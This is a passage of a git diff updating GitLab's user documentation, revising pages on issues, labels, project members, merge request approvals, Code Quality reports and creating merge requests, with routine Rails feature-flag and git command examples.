Press <kbd>Enter</kbd> to save. -## Blocked issues +## Blocked issues **(PREMIUM)** > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/34723) in GitLab 12.8. > - [View blocking issues when hovering over blocked icon](https://gitlab.com/gitlab-org/gitlab/-/issues/210452) in GitLab 13.10. diff --git a/doc/user/project/issues/associate_zoom_meeting.md b/doc/user/project/issues/associate_zoom_meeting.md index f98e94c66ae..e020bdee737 100644 --- a/doc/user/project/issues/associate_zoom_meeting.md +++ b/doc/user/project/issues/associate_zoom_meeting.md @@ -4,7 +4,7 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Associate a Zoom meeting with an issue +# Associate a Zoom meeting with an issue **(FREE)** > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/16609) in GitLab 12.4. diff --git a/doc/user/project/issues/confidential_issues.md b/doc/user/project/issues/confidential_issues.md index ed15d7a2e63..92c26fb654e 100644 --- a/doc/user/project/issues/confidential_issues.md +++ b/doc/user/project/issues/confidential_issues.md @@ -4,11 +4,9 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Confidential issues +# Confidential issues **(FREE)** -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/3282) in GitLab 8.6. - -Confidential issues are issues visible only to members of a project with +Confidential issues are [issues](index.md) visible only to members of a project with [sufficient permissions](#permissions-and-access-to-confidential-issues). Confidential issues can be used by open source projects and companies alike to keep security vulnerabilities private or prevent surprises from leaking out. diff --git a/doc/user/project/issues/crosslinking_issues.md b/doc/user/project/issues/crosslinking_issues.md index 63b38520c98..2b07131df6e 100644 --- a/doc/user/project/issues/crosslinking_issues.md +++ b/doc/user/project/issues/crosslinking_issues.md @@ -4,9 +4,9 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Crosslinking issues +# Crosslinking issues **(FREE)** -There are several ways to mention an issue or make issues appear in each other's +There are several ways to mention an issue or make [issues](index.md) appear in each other's [Linked issues](related_issues.md) section. For more information on GitLab Issues, read the [issues documentation](index.md). diff --git a/doc/user/project/issues/img/issue_type_change_v13_12.png b/doc/user/project/issues/img/issue_type_change_v13_12.png Binary files differindex 3b4864ffbbb..55aa607b878 100644 --- a/doc/user/project/issues/img/issue_type_change_v13_12.png +++ b/doc/user/project/issues/img/issue_type_change_v13_12.png diff --git a/doc/user/project/issues/issue_data_and_actions.md b/doc/user/project/issues/issue_data_and_actions.md index 13f5beadb16..2ef12cd1240 100644 --- a/doc/user/project/issues/issue_data_and_actions.md +++ b/doc/user/project/issues/issue_data_and_actions.md @@ -4,7 +4,7 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Issue Data and Actions +# Issue Data and Actions **(FREE)** Please read through the [GitLab Issue Documentation](index.md) for an overview on GitLab Issues. @@ -151,7 +151,7 @@ cannot access the issue, and it is not listed in the project's issue boards nor ### Lock issue -You can [lock the threads](../../discussions/index.md#lock-discussions) in the issue, +You can [lock the issue](../../discussions/index.md#prevent-comments-by-locking-an-issue) to prevent further comments from being added. ### Participants @@ -288,7 +288,7 @@ supports [GitLab Flavored Markdown](../../markdown.md#gitlab-flavored-markdown). After you write a comment, you can: - Click **Comment** to publish your comment. -- Choose **Start thread** from the dropdown list and start a new [thread](../../discussions/index.md#threaded-discussions) +- Choose **Start thread** from the dropdown list and start a new [thread](../../discussions/index.md#create-a-thread-without-replying-to-a-comment) in that issue's main thread to discuss specific points. This invites other participants to reply directly to your thread, keeping related comments grouped together. diff --git a/doc/user/project/issues/managing_issues.md b/doc/user/project/issues/managing_issues.md index 35573518626..c570bc9612a 100644 --- a/doc/user/project/issues/managing_issues.md +++ b/doc/user/project/issues/managing_issues.md @@ -4,7 +4,7 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Managing issues +# Managing issues **(FREE)** [GitLab Issues](index.md) are the fundamental medium for collaborating on ideas and planning work in GitLab. @@ -333,7 +333,7 @@ of your installation. ## Change the issue type -Users with [developer permission](../../permissions.md) +Users with the [Developer role](../../permissions.md) can change an issue's type. To do this, edit the issue and select an issue type from the **Issue type** selector menu: diff --git a/doc/user/project/issues/sorting_issue_lists.md b/doc/user/project/issues/sorting_issue_lists.md index 97a790c2527..2681a39aeb6 100644 --- a/doc/user/project/issues/sorting_issue_lists.md +++ b/doc/user/project/issues/sorting_issue_lists.md @@ -8,7 +8,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w You can sort a list of issues several ways, including by: -- Blocking +- Blocking **(PREMIUM)** - Created date - Due date - Label priority @@ -51,7 +51,7 @@ This ordering also affects [issue boards](../issue_board.md#how-gitlab-orders-is Changing the order in an issue list changes the ordering in an issue board, and vice versa. -## Sorting by blocking issues +## Sorting by blocking issues **(PREMIUM)** > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/34247/) in GitLab 13.7. diff --git a/doc/user/project/labels.md b/doc/user/project/labels.md index e7adc045e98..43d6ab2070d 100644 --- a/doc/user/project/labels.md +++ b/doc/user/project/labels.md @@ -59,7 +59,7 @@ and edit labels. > Showing all inherited labels [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/241990) in GitLab 13.5. -To view a project's available labels, in the project, go to **Issues > Labels**. +To view a project's available labels, in the project, go to **Project information > Labels**. Its list of labels includes both the labels defined at the project level, and all labels defined by its ancestor groups. For each label, you can see the project or group path from where it was created. You can filter the list by @@ -68,7 +68,7 @@ icon (**{search}**). To create a new project label: -1. In your project, go to **Issues > Labels**. +1. In your project, go to **Project information > Labels**. 1. Select the **New label** button. 1. In the **Title** field, enter a short, descriptive name for the label. You can also use this field to create [scoped, mutually exclusive labels](#scoped-labels). @@ -118,18 +118,18 @@ Promoting a label is a permanent action, and cannot be reversed. To promote a project label to a group label: -1. Navigate to **Issues > Labels** in the project. +1. Navigate to **Project information > Labels** in the project. 1. Click on the three dots (**{ellipsis_v}**) next to the **Subscribe** button and select **Promote to group label**. ### Group labels -To view the group labels list, navigate to the group and click **Issues > Labels**. +To view the group labels list, navigate to the group and click **Group information > Labels**. The list includes all labels that are defined at the group level only. It does not list any labels that are defined in projects. You can filter the list by entering a search query at the top and clicking search (**{search}**). -To create a **group label**, navigate to **Issues > Labels** in the group and +To create a **group label**, navigate to **Group information > Labels** in the group and follow the same process as [creating a project label](#project-labels). #### Create group labels from epics **(ULTIMATE)** diff --git a/doc/user/project/members/index.md b/doc/user/project/members/index.md index 11d6bfb5d0c..8987c663860 100644 --- a/doc/user/project/members/index.md +++ b/doc/user/project/members/index.md @@ -24,7 +24,7 @@ To add a user to a project: 1. Go to your project and select **Project information > Members**. 1. On the **Invite member** tab, under **GitLab member or Email address**, type the username or email address. In GitLab 13.11 and later, you can [replace this form with a modal window](#add-a-member-modal-window). -1. Select a [role](../../permissions.md). +1. Select a [role](../../permissions.md). 1. Optional. Choose an expiration date. On that date, the user can no longer access the project. 1. Select **Invite**. @@ -54,7 +54,7 @@ To add groups to a project: 1. Go to your project and select **Project information > Members**. 1. On the **Invite group** tab, under **Select a group to invite**, choose a group. -1. Select the highest max [role](../../permissions.md) for users in the group. +1. Select the highest max [role](../../permissions.md) for users in the group. 1. Optional. Choose an expiration date. On that date, the user can no longer access the project. 1. Select **Invite**. @@ -99,6 +99,8 @@ In this example: - **Administrator** is the [Owner](../../permissions.md) and member of all groups. They have inherited their role from the **demo** group. +If a user is a direct member of a project, the expiration date can be updated. If membership is inherited from a parent group, the expiration date can be updated only from the parent group itself. + ## Remove a member from a project If a user is a direct member of a project, you can remove them. @@ -156,7 +158,7 @@ You can sort members by **Account**, **Access granted**, **Max role**, or **Last ## Request access to a project -GitLab users can request to become a member of a project. +GitLab users can request to become a member of a project. 1. Go to the project you'd like to be a member of. 1. By the project name, select **Request Access**. diff --git a/doc/user/project/merge_requests/accessibility_testing.md b/doc/user/project/merge_requests/accessibility_testing.md index 76aff18b00d..2bc6d5bb148 100644 --- a/doc/user/project/merge_requests/accessibility_testing.md +++ b/doc/user/project/merge_requests/accessibility_testing.md @@ -10,7 +10,7 @@ type: reference, howto > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/25144) in GitLab 12.8. If your application offers a web interface and you are using -[GitLab CI/CD](../../../ci/README.md), you can quickly determine the accessibility +[GitLab CI/CD](../../../ci/index.md), you can quickly determine the accessibility impact of pending code changes. ## Overview @@ -37,7 +37,7 @@ This example shows how to run [pa11y](https://pa11y.org/) on your code with GitLab CI/CD using the [GitLab Accessibility Docker image](https://gitlab.com/gitlab-org/ci-cd/accessibility). For GitLab 12.9 and later, to define the `a11y` job, you must -[include](../../../ci/yaml/README.md#includetemplate) the +[include](../../../ci/yaml/index.md#includetemplate) the [`Accessibility.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Verify/Accessibility.gitlab-ci.yml) included with your GitLab installation, as shown below. diff --git a/doc/user/project/merge_requests/approvals/index.md b/doc/user/project/merge_requests/approvals/index.md index 3c47c2af344..40345f33cb2 100644 --- a/doc/user/project/merge_requests/approvals/index.md +++ b/doc/user/project/merge_requests/approvals/index.md @@ -11,11 +11,21 @@ disqus_identifier: 'https://docs.gitlab.com/ee/user/project/merge_requests/merge > Redesign [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/1979) in [GitLab Premium](https://about.gitlab.com/pricing/) 11.8 and [feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/10685) in 12.0. You can configure your merge requests so that they must be approved before -they can be merged. You can do this by creating [rules](rules.md) or by specifying -a list of users who act as [code owners](../../code_owners.md) for specific files. - -You can configure merge request approvals for each project. In higher GitLab tiers, -Administrators of self-managed GitLab instances can configure approvals +they can be merged. While [GitLab Free](https://about.gitlab.com/pricing/) allows +all users with Developer or greater [permissions](../../../permissions.md) to +approve merge requests, these approvals are [optional](#optional-approvals). +[GitLab Premium](https://about.gitlab.com/pricing/) and +[GitLab Ultimate](https://about.gitlab.com/pricing/) provide additional +flexibility: + +- Create required [rules](rules.md) about the number and type of approvers before work can merge. +- Specify a list of users who act as [code owners](../../code_owners.md) for specific files, + and require their approval before work can merge. + +You can configure merge request approvals on a per-project basis. Administrators of +[GitLab Premium](https://about.gitlab.com/pricing/) and +[GitLab Ultimate](https://about.gitlab.com/pricing/) self-managed GitLab instances +can also configure approvals [for the entire instance](../../../admin_area/merge_requests_approvals.md). ## How approvals work @@ -60,7 +70,7 @@ a merge request. After a merge request receives the [number and type of approvals](rules.md) you configure, it can merge unless it's blocked for another reason. Merge requests can be blocked by other problems, -such as merge conflicts, [pending discussions](../../../discussions/index.md#only-allow-merge-requests-to-be-merged-if-all-threads-are-resolved), +such as merge conflicts, [pending discussions](../../../discussions/index.md#prevent-merge-unless-all-threads-are-resolved), or a [failed CI/CD pipeline](../merge_when_pipeline_succeeds.md). To prevent merge request authors from approving their own merge requests, @@ -94,6 +104,7 @@ Without the approvals, the work cannot merge. Required approvals enable multiple database, for all proposed code changes. - Use the [code owners of changed files](rules.md#code-owners-as-eligible-approvers), to determine who should review the work. +- Require an [approval before merging code that causes test coverage to decline](../../../../ci/pipelines/settings.md#coverage-check-approval-rule) - [Require approval from a security team](../../../application_security/index.md#security-approvals-in-merge-requests) before merging code that could introduce a vulnerability. **(ULTIMATE)** diff --git a/doc/user/project/merge_requests/approvals/rules.md b/doc/user/project/merge_requests/approvals/rules.md index 1e4b0f659ee..82685f9101e 100644 --- a/doc/user/project/merge_requests/approvals/rules.md +++ b/doc/user/project/merge_requests/approvals/rules.md @@ -5,7 +5,7 @@ info: "To determine the technical writer assigned to the Stage/Group associated type: reference, concepts --- -# Merge request approval rules **(FREE)** +# Merge request approval rules **(PREMIUM)** Approval rules define how many [approvals](index.md) a merge request must receive before it can be merged, and which users should do the approving. You can define approval rules: @@ -159,7 +159,7 @@ become eligible approvers in the project. To enable this merge request approval  You can also -[require code owner approval](../../protected_branches.md#protected-branches-approval-by-code-owners) +[require code owner approval](../../protected_branches.md#require-code-owner-approval-on-a-protected-branch) for protected branches. **(PREMIUM)** ## Merge request approval segregation of duties **(PREMIUM)** @@ -173,6 +173,7 @@ Some users (like managers) may not need permission to push or merge code, but st oversight on proposed work. To enable approval permissions for these users without granting them push access: +1. [Create a protected branch](../../protected_branches.md) 1. [Create a new group](../../../group/index.md#create-a-group). 1. [Add the user to the group](../../../group/index.md#add-users-to-a-group), and select the Reporter role for the user. @@ -180,7 +181,7 @@ granting them push access: based on the Reporter role. 1. Go to your project and select **Settings > General**. 1. Expand **Merge request (MR) approvals**. -1. Select **Add approval rule** or **Update approval rule**. +1. Select **Add approval rule** or **Update approval rule** and target the protected branch. 1. [Add the group](../../../group/index.md#create-a-group) to the permission list.  @@ -203,7 +204,7 @@ on a merge request, you can either add or remove approvers: Administrators can change the [merge request approvals settings](settings.md#prevent-overrides-of-default-approvals) to prevent users from overriding approval rules for merge requests. -## Configure optional approval rules +## Configure optional approval rules **(PREMIUM)** Merge request approvals can be optional for projects where approvals are appreciated, but not required. To make an approval rule optional: @@ -229,4 +230,4 @@ approval rule for certain branches:  1. To enable this configuration, read - [Code Owner's approvals for protected branches](../../protected_branches.md#protected-branches-approval-by-code-owners). + [Code Owner's approvals for protected branches](../../protected_branches.md#require-code-owner-approval-on-a-protected-branch). diff --git a/doc/user/project/merge_requests/approvals/settings.md b/doc/user/project/merge_requests/approvals/settings.md index b72a4125d0e..8a81ff8c94b 100644 --- a/doc/user/project/merge_requests/approvals/settings.md +++ b/doc/user/project/merge_requests/approvals/settings.md @@ -115,8 +115,16 @@ permission enables an electronic signature for approvals, such as the one define ## Security approvals in merge requests **(ULTIMATE)** You can require that a member of your security team approves a merge request if a -merge request could introduce a vulnerability. To learn more, see -[Security approvals in merge requests](../../../application_security/index.md#security-approvals-in-merge-requests). +merge request could introduce a vulnerability. + +To learn more, see [Security approvals in merge requests](../../../application_security/index.md#security-approvals-in-merge-requests). + +## Code coverage check approvals **(PREMIUM)** + +You can require specific approvals if a merge request would result in a decline in code test +coverage. + +To learn more, see [Coverage check approval rule](../../../../ci/pipelines/settings.md#coverage-check-approval-rule). ## Related links diff --git a/doc/user/project/merge_requests/authorization_for_merge_requests.md b/doc/user/project/merge_requests/authorization_for_merge_requests.md index 930df65f3fc..339f67f828f 100644 --- a/doc/user/project/merge_requests/authorization_for_merge_requests.md +++ b/doc/user/project/merge_requests/authorization_for_merge_requests.md @@ -17,7 +17,7 @@ There are two main ways to have a merge request flow with GitLab: With the protected branch flow everybody works within the same GitLab project. The project maintainers get the [Maintainer role](../../permissions.md) and the regular developers -get Developer access. +get the Developer role. Maintainers mark the authoritative branches as 'Protected'. diff --git a/doc/user/project/merge_requests/browser_performance_testing.md b/doc/user/project/merge_requests/browser_performance_testing.md index d11ad53a9d6..eff3a5bd99e 100644 --- a/doc/user/project/merge_requests/browser_performance_testing.md +++ b/doc/user/project/merge_requests/browser_performance_testing.md @@ -10,7 +10,7 @@ type: reference, howto > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/3507) in [GitLab Premium](https://about.gitlab.com/pricing/) 10.3. If your application offers a web interface and you're using -[GitLab CI/CD](../../../ci/README.md), you can quickly determine the rendering performance +[GitLab CI/CD](../../../ci/index.md), you can quickly determine the rendering performance impact of pending code changes in the browser. NOTE: @@ -40,7 +40,7 @@ Consider the following workflow: ## How browser performance testing works First, define a job in your `.gitlab-ci.yml` file that generates the -[Browser Performance report artifact](../../../ci/yaml/README.md#artifactsreportsbrowser_performance). +[Browser Performance report artifact](../../../ci/yaml/index.md#artifactsreportsbrowser_performance). GitLab then checks this report, compares key performance metrics for each page between the source and target branches, and shows the information in the merge request. @@ -89,7 +89,7 @@ The above example: GitLab 12.3 or earlier, you must [add the configuration manually](#gitlab-versions-132-and-earlier). The template uses the [GitLab plugin for sitespeed.io](https://gitlab.com/gitlab-org/gl-performance), -and it saves the full HTML sitespeed.io report as a [Browser Performance report artifact](../../../ci/yaml/README.md#artifactsreportsbrowser_performance) +and it saves the full HTML sitespeed.io report as a [Browser Performance report artifact](../../../ci/yaml/index.md#artifactsreportsbrowser_performance) that you can later download and analyze. This implementation always takes the latest Browser Performance artifact available. If [GitLab Pages](../pages/index.md) is enabled, you can view the report directly in your browser. diff --git a/doc/user/project/merge_requests/code_quality.md b/doc/user/project/merge_requests/code_quality.md index 27642a9bd5d..19302572dc9 100644 --- a/doc/user/project/merge_requests/code_quality.md +++ b/doc/user/project/merge_requests/code_quality.md @@ -10,17 +10,22 @@ type: reference, howto > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/1984) in GitLab 9.3. > - Made [available in all tiers](https://gitlab.com/gitlab-org/gitlab/-/issues/212499) in 13.2. -Ensuring your project's code stays simple, readable and easy to contribute to can be problematic. With the help of [GitLab CI/CD](../../../ci/README.md), you can analyze your -source code quality using GitLab Code Quality. +To ensure your project's code stays simple, readable, and easy to contribute to, +you can use [GitLab CI/CD](../../../ci/index.md) to analyze your source code quality. + +For example, while you're implementing a feature, you can run Code Quality reports +to analyze how your improvements are impacting your code's quality. You can +use this information to ensure that your changes are improving performance rather +than degrading it. Code Quality: -- Uses [Engines](https://docs.codeclimate.com/docs/list-of-engines) supported by Code Climate, which are +- Uses [plugins](https://docs.codeclimate.com/docs/list-of-engines) supported by Code Climate, which are free and open source. Code Quality does not require a Code Climate subscription. -- Runs in [pipelines](../../../ci/pipelines/index.md) using a Docker image built in the - [GitLab Code - Quality](https://gitlab.com/gitlab-org/ci-cd/codequality) project using [default Code Climate configurations](https://gitlab.com/gitlab-org/ci-cd/codequality/-/tree/master/codeclimate_defaults). +- Runs in [pipelines](../../../ci/pipelines/index.md) by using a Docker image built in the + [GitLab Code Quality](https://gitlab.com/gitlab-org/ci-cd/codequality) project. +- Uses [default Code Climate configurations](https://gitlab.com/gitlab-org/ci-cd/codequality/-/tree/master/codeclimate_defaults). - Can make use of a [template](#example-configuration). - Is available by using [Auto Code Quality](../../../topics/autodevops/stages.md#auto-code-quality), provided by [Auto DevOps](../../../topics/autodevops/index.md). - Can be extended through [Analysis Plugins](https://docs.codeclimate.com/docs/list-of-engines) or a [custom tool](#implementing-a-custom-tool). @@ -54,42 +59,14 @@ See also the Code Climate list of [Supported Languages for Maintainability](http > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/267612) in [GitLab Ultimate](https://about.gitlab.com/pricing/) 13.11. > - [Deployed behind a feature flag](../../../user/feature_flags.md), disabled by default. > - [Enabled by default](https://gitlab.com/gitlab-org/gitlab/-/issues/284140) in GitLab 13.12. -> - [Feature enhanced](https://gitlab.com/gitlab-org/gitlab/-/issues/2526) in GitLab 14.0. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/284140) in GitLab 14.1. +> - [Inline annotation added](https://gitlab.com/gitlab-org/gitlab/-/issues/2526) in GitLab 14.1. Changes to files in merge requests can cause Code Quality to fall if merged. In these cases, the merge request's diff view displays an indicator next to lines with new Code Quality violations. For example:  -Previously, an indicator was displayed (**{information-o}** **Code Quality**) on the file in the merge request's diff view: - - - -To switch to the previous version of this feature, a GitLab administrator can run the following in a -[Rails console](../../../administration/operations/rails_console.md): - -```ruby -# For the instance -Feature.disable(:codequality_mr_diff_annotations) -# For a single project -Feature.disable(:codequality_mr_diff_annotations, Project.find(<project id>)) -``` - -## Use cases - -For instance, consider the following workflow: - -1. Your backend team member starts a new implementation for making a certain - feature in your app faster. -1. With Code Quality reports, they analyze how their implementation is impacting - the code quality. -1. The metrics show that their code degrades the quality by 10 points. -1. You ask a co-worker to help them with this modification. -1. They both work on the changes until Code Quality report displays no - degradations, only improvements. -1. You approve the merge request and authorize its deployment to staging. -1. Once verified, their changes are deployed to production. - ## Example configuration This example shows how to run Code Quality on your code by using GitLab CI/CD and Docker. @@ -111,7 +88,7 @@ include: The above example creates a `code_quality` job in your CI/CD pipeline which scans your source code for code quality issues. The report is saved as a -[Code Quality report artifact](../../../ci/yaml/README.md#artifactsreportscodequality) +[Code Quality report artifact](../../../ci/yaml/index.md#artifactsreportscodequality) that you can later download and analyze. It's also possible to override the URL to the Code Quality image by @@ -262,13 +239,13 @@ was chosen as an operational decision by the runner team, instead of exposing `d ### Disabling the code quality job The `code_quality` job doesn't run if the `$CODE_QUALITY_DISABLED` CI/CD variable -is present. Please refer to the CI/CD variables [documentation](../../../ci/variables/README.md) +is present. Please refer to the CI/CD variables [documentation](../../../ci/variables/index.md) to learn more about how to define one. To disable the `code_quality` job, add `CODE_QUALITY_DISABLED` as a custom CI/CD variable. This can be done: -- For [the whole project](../../../ci/variables/README.md#custom-cicd-variables). +- For [the whole project](../../../ci/variables/index.md#custom-cicd-variables). - For a single pipeline run: 1. Go to **CI/CD > Pipelines** @@ -278,11 +255,11 @@ This can be done: ### Using with merge request pipelines The configuration provided by the Code Quality template does not let the `code_quality` job -run on [pipelines for merge requests](../../../ci/merge_request_pipelines/index.md). +run on [pipelines for merge requests](../../../ci/pipelines/merge_request_pipelines.md). If pipelines for merge requests is enabled, the `code_quality:rules` must be redefined. -The template has these [`rules`](../../../ci/yaml/README.md#rules) for the `code quality` job: +The template has these [`rules`](../../../ci/yaml/index.md#rules) for the `code quality` job: ```yaml code_quality: @@ -292,7 +269,7 @@ code_quality: - if: '$CI_COMMIT_TAG || $CI_COMMIT_BRANCH' ``` -If you are using merge request pipelines, your `rules` (or [`workflow: rules`](../../../ci/yaml/README.md#workflow)) +If you are using merge request pipelines, your `rules` (or [`workflow: rules`](../../../ci/yaml/index.md#workflow)) might look like this example: ```yaml @@ -334,7 +311,7 @@ do this: 1. Define a job in your `.gitlab-ci.yml` file that generates the [Code Quality report - artifact](../../../ci/yaml/README.md#artifactsreportscodequality). + artifact](../../../ci/yaml/index.md#artifactsreportscodequality). 1. Configure your tool to generate the Code Quality report artifact as a JSON file that implements a subset of the [Code Climate spec](https://github.com/codeclimate/platform/blob/master/spec/analyzers/SPEC.md#data-types). @@ -342,13 +319,13 @@ do this: The Code Quality report artifact JSON file must contain an array of objects with the following properties: -| Name | Description | -| ---------------------- | -------------------------------------------------------------------------------------- | -| `description` | A description of the code quality violation. | -| `fingerprint` | A unique fingerprint to identify the code quality violation. For example, an MD5 hash. | -| `severity` | A severity string (can be `info`, `minor`, `major`, `critical`, or `blocker`). | -| `location.path` | The relative path to the file containing the code quality violation. | -| `location.lines.begin` | The line on which the code quality violation occurred. | +| Name | Description | +| ---------------------- | ----------------------------------------------------------------------------------------- | +| `description` | A description of the code quality violation. | +| `fingerprint` | A unique fingerprint to identify the code quality violation. For example, an MD5 hash. | +| `severity` | A severity string (can be `info`, `minor`, `major`, `critical`, or `blocker`). | +| `location.path` | The relative path to the file containing the code quality violation. | +| `location.lines.begin` or `location.positions.begin.line` | The line on which the code quality violation occurred. | Example: @@ -371,6 +348,8 @@ Example: NOTE: Although the Code Climate spec supports more properties, those are ignored by GitLab. +The GitLab parser does not allow a [byte order mark](https://en.wikipedia.org/wiki/Byte_order_mark) +at the beginning of the file. ## Code Quality reports **(PREMIUM)** @@ -389,7 +368,7 @@ After the Code Quality job completes: - The full list of code quality violations generated by a pipeline is shown in the Code Quality tab of the Pipeline Details page. **(PREMIUM)** -### Generating an HTML report +## Generate an HTML report In [GitLab 13.6 and later](https://gitlab.com/gitlab-org/ci-cd/codequality/-/issues/10), it is possible to generate an HTML report file by setting the `REPORT_FORMAT` @@ -535,7 +514,7 @@ This can be due to multiple reasons: - Your pipeline is not set to run the code quality job on your target branch. If there is no report generated from the target branch, your MR branch reports have nothing to compare to. - If no [degradation or error is detected](https://docs.codeclimate.com/docs/maintainability#section-checks), nothing is displayed. -- The [`artifacts:expire_in`](../../../ci/yaml/README.md#artifactsexpire_in) CI/CD +- The [`artifacts:expire_in`](../../../ci/yaml/index.md#artifactsexpire_in) CI/CD setting can cause the Code Quality artifact(s) to expire faster than desired. - The widgets use the pipeline of the latest commit to the target branch. If commits are made to the default branch that do not run the code quality job, this may cause the merge request widget to have no base report for comparison. - If you use the [`REPORT_STDOUT` environment variable](https://gitlab.com/gitlab-org/ci-cd/codequality#environment-variables), no report file is generated and nothing displays in the merge request. diff --git a/doc/user/project/merge_requests/commits.md b/doc/user/project/merge_requests/commits.md index 1bda12468a3..fb1b7f8b9b6 100644 --- a/doc/user/project/merge_requests/commits.md +++ b/doc/user/project/merge_requests/commits.md @@ -26,3 +26,62 @@ To seamlessly navigate among commits in a merge request: - Using the <kbd>X</kbd> and <kbd>C</kbd> keyboard shortcuts.  + +## View merge request commits in context + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/29274) in GitLab 13.12. +> - [Deployed behind a feature flag](../../feature_flags.md), enabled by default. +> - Disabled on GitLab.com. +> - Not recommended for production use. +> - To use in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-viewing-merge-request-commits-in-context). **(FREE SELF)** + +WARNING: +This feature is in [beta](https://about.gitlab.com/handbook/product/gitlab-the-product/#beta) +and is [incomplete](https://gitlab.com/groups/gitlab-org/-/epics/1192). +Previously merged commits can be added, but they can't be removed due to +[this bug](https://gitlab.com/gitlab-org/gitlab/-/issues/325538). + +This in-development feature might not be available for your use. There can be +[risks when enabling features still in development](../../feature_flags.md#risks-when-enabling-features-still-in-development). +Refer to this feature's version history for more details. + +When reviewing a merge request, it helps to have more context about the changes +made. That includes unchanged lines in unchanged files, and previous commits +that have already merged that the change is built on. + +To add previously merged commits to a merge request for more context: + +1. Go to your merge request. +1. Select the **Commits** tab. +1. Scroll to the end of the list of commits, and select **Add previously merged commits**: + +  + +1. Select the commits that you want to add. +1. Select **Save changes**. + +To view the changes done on those previously merged commits: + +1. On your merge request, select the **Changes** tab. +1. Scroll to **(file-tree)** **Compare** and select **previously merged commits**: + +  + +### Enable or disable viewing merge request commits in context **(FREE SELF)** + +Viewing merge request commits in context is under development and not ready for production use. It is +deployed behind a feature flag that is **disabled by default**. +[GitLab administrators with access to the GitLab Rails console](../../../administration/feature_flags.md) +can enable it. + +To enable it: + +```ruby +Feature.enable(:context_commits) +``` + +To disable it: + +```ruby +Feature.disable(:context_commits) +``` diff --git a/doc/user/project/merge_requests/creating_merge_requests.md b/doc/user/project/merge_requests/creating_merge_requests.md index 430c6488b26..0d56fbc89b8 100644 --- a/doc/user/project/merge_requests/creating_merge_requests.md +++ b/doc/user/project/merge_requests/creating_merge_requests.md @@ -7,189 +7,155 @@ description: "How to create merge requests in GitLab." disqus_identifier: 'https://docs.gitlab.com/ee/gitlab-basics/add-merge-request.html' --- -# How to create a merge request **(FREE)** +# Creating merge requests **(FREE)** -Before creating a merge request, read through an -[introduction to merge requests](getting_started.md) -to familiarize yourself with the concept, the terminology, -and to learn what you can do with them. +There are many different ways to create a merge request. -Every merge request starts by creating a branch. You can either -do it locally through the [command line](#new-merge-request-from-your-local-environment), via a Git CLI application, -or through the [GitLab UI](#new-merge-request-from-a-new-branch-created-through-the-ui). +## From the merge request list -This document describes the several ways to create a merge request. +You can create a merge request from the list of merge requests. -When you start a new merge request, regardless of the method, -you are taken to the [**New merge request** page](#new-merge-request-page) -to fill it with information about the merge request. +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left menu, select **Merge requests**. +1. In the top right, select **New merge request**. +1. Select a source and target branch and then **Compare branches and continue**. +1. Fill out the fields and select **Create merge request**. -If you push a new branch to GitLab, also regardless of the method, -you can click the [**Create merge request**](#create-merge-request-button) -button and start a merge request from there. +## From an issue -## New merge request page +You can [create a merge request from an issue](../repository/web_editor.md#create-a-new-branch-from-an-issue). -On the **New merge request** page, start by filling in the title and description -for the merge request. If commits already exist on the branch, GitLab suggests a -merge request title for you: +## When you add, edit, or upload a file -- **If a multi-line commit message exists**: GitLab adds the first line of the - first multi-line commit message as the title. Any additional lines in that - commit message become the description. -- **If no multi-line commit message exists**: GitLab adds the branch name as the - title, and leaves the description blank. +You can create a merge request when you add, edit, or upload a file to a repository. -The title is the only field that is mandatory in all cases. +1. Add, edit, or upload a file to the repository. +1. In the **Commit message**, enter a reason for the commit. +1. Select the **Target branch** or create a new branch by typing the name (without spaces, capital letters, or special chars). +1. Select the **Start a new merge request with these changes** checkbox or toggle. This checkbox or toggle is visible only + if the target is not the same as the source branch, or if the source branch is protected. +1. Select **Commit changes**. -From there, you can fill it with information (title, description, -assignee(s), milestone, labels, approvers) and click **Create merge request**. +## When you create a branch -From that initial screen, you can also see all the commits, -pipelines, and file changes pushed to your branch before submitting -the merge request. +You can create a merge request when you create a branch. - +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left menu, select **Repository > Branches**. +1. Type a branch name and select **New branch**. +1. Above the file list, on the right side, select **Create merge request**. + A merge request is created. The default branch is the target. +1. Fill out the fields and select **Create merge request**. -NOTE: -You can push one or more times to your branch in GitLab before -creating the merge request. +## When you use Git commands locally -## Create merge request button +You can create a merge request by running Git commands on your local machine. -Once you have pushed a new branch to GitLab, visit your repository -in GitLab and to see a call-to-action at the top of your screen -from which you can click the button **Create merge request**. +1. Create a branch: - + ```shell + git checkout -b my-new-branch + ``` -You can also see the **Create merge request** button in the top-right of the: +1. Create, edit, or delete files. The stage and commit them: -- **Project** page. -- **Repository > Files** page. -- **Merge requests** page. + ```shell + git add . + git commit -m "My commit message" + ``` -In this case, GitLab uses the most recent branch you pushed -changes to as the source branch, and the default branch in the current -project as the target. +1. [Push your branch to 